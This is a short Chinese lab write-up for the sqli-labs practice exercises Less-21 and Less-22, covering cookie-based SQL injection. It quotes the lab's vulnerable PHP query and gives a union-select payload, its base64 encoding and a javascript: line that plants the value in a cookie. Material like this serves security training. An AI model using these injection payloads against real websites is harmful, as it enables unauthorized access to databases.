sql-lab:Less21-22(后续接着更新)
2021/5/21 19:27:50
本文主要是介绍sql-lab:Less21-22(后续接着更新),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
文章目录
- Less-21
- Less-22
Less-21
此题为SQL注入中的一种注入方式,为cookie注入,具体详解见如下链接
链接:https://blog.csdn.net/LSYZWF/article/details/117072765
Less-22
此题原理和Less-21一致,只是在构造拼接字段有所差异
题目提示为双引号的base64编码cookie注入
可以猜测后面的字段应该是用双引号括起来的
查看源码SQL语句:
$cookee = base64_decode($cookee); $cookee1 = '"'. $cookee. '"'; echo "<br></font>"; $sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
注意第二行,在对cookie进行base64解码后的结果两边加上双引号
查询数据库
编码前:1" union select 1,database(),3#
base64编码后:MSIgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwzIw==
设置cookie
可以在地址栏直接设置:
javascript:alert(document.cookie=‘uname=’+escape(‘MSIgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwzIw==’))
重新打开网址,得到结果
查表和查字段也是一样,对需要拼接的语句base64编码后设置cookie即可。
这篇关于sql-lab:Less21-22(后续接着更新)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-09-19环境变量处理课程:新手入门教程
- 2024-09-19接口模块封装课程:新手入门指南
- 2024-09-19请求动作封装课程:新手入门教程
- 2024-09-19拖拽表格课程:新手入门指南
- 2024-09-19页面权限课程:新手必学的权限管理入门教程
- 2024-09-19如何正确主动登出课程:新手必读教程
- 2024-09-19Element-Plus课程:新手入门与初级教程
- 2024-09-19Token处理入门教程:新手必看指南
- 2024-09-19如何应对被动登出课程的情况:新手必读指南
- 2024-09-19打包优化课程:初学者的必备指南